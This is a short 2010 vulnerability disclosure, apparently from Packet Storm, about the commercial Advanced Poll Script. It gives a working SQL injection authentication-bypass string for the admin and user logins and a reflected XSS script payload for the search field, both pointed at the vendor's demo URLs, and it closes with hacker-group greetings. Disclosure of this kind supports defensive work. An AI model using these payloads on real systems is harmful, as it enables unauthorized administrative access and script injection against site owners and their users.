Advanced Poll Script suffers from cross site scripting and SQL injection vulnerabilities.
808e735e5b531a893c07e8dda2585ff7e7483469190950ea0296d84a52aa2221# Exploit Title: XSS and Authentication bypass in Advanced Poll Script
# Date: 26-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : [] ______________________________________________________________________________
XSS and Authentication bypass in Advanced Poll Script
Vendor:http://www.2daybiz.com/
___________________________Author:Sid3^effects_________________________________
Description :
Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support.
script cost :$140
---------------------------------------------------------------------------
* Authentication bypass:
The following script has authentication bypass in the admin login as well as in user login
use ' or 1=1 or ''=' in both login and password.
user login demo :http://www.2daybiz.com/products/polls/login.php
admin login demo: http://www.2daybiz.com/products/polls/admin/
---------------------------------------------------------------------------
* XSS (cross site scripting ) :
XSS is also found in the search field.
Attack Pattern: '"--><script>alert(0x000872)</script>
DEMO:http://www.2daybiz.com/products/polls/index_search.php?category= [XSS]
---------------------------------------------------------------------------
ShoutZ :
-------
---Indian Cyber warriors--Andhra hackers--
Greetz :
--------
---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed